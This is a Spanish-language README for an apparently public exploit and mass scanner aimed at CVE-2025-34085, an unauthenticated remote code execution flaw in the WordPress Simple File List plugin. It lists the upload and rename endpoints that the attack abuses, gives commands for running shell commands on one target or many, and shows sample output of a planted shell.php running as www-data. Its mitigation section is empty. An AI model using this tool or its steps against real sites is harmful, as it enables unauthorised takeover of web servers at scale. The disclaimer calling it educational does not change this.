
WordPress Simple File List - Exploit de RCE No Autenticado
Un exploit y escáner automatizado para CVE-2025-34085, una vulnerabilidad crítica en el plugin WordPress Simple File List, que permite ejecución remota de código no autenticada a través de funcionalidades de carga y renombrado arbitrario de archivos.
Carga de Archivos No Autenticada
/wp-content/plugins/simple-file-list/ee-upload-engine.phpRenombrado a Extensión PHP
.php o similar mediante:/wp-content/plugins/simple-file-list/ee-file-engine.phpEjecutar el Payload
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
Coloca las URLs de los objetivos en targets.txt (una por línea), luego ejecuta:
python3 CVE-2025-34085.py --cmd "whoami"
| Argumento | Descripción |
|---|---|
-u | URL del objetivo (ej., http://example.com) |
--cmd | Comando a ejecutar en el shell remoto (por defecto: id) |
--inline | Usar payload inline (sin parámetro ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Los objetivos exitosos se guardan en vuln.txt.
CVE-2025-34085.py — Script principal del exploittargets.txt — (Opcional) Lista de dominios objetivovuln.txt — Registro de exploits exitososLos administradores deberían:
Este proyecto está destinado únicamente a fines educativos y de pruebas autorizadas. El autor no asume ninguna responsabilidad por el mal uso o daños causados por esta herramienta.
Este proyecto está licenciado bajo la Licencia MIT. 📄 Ver el Texto Completo de la Licencia
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n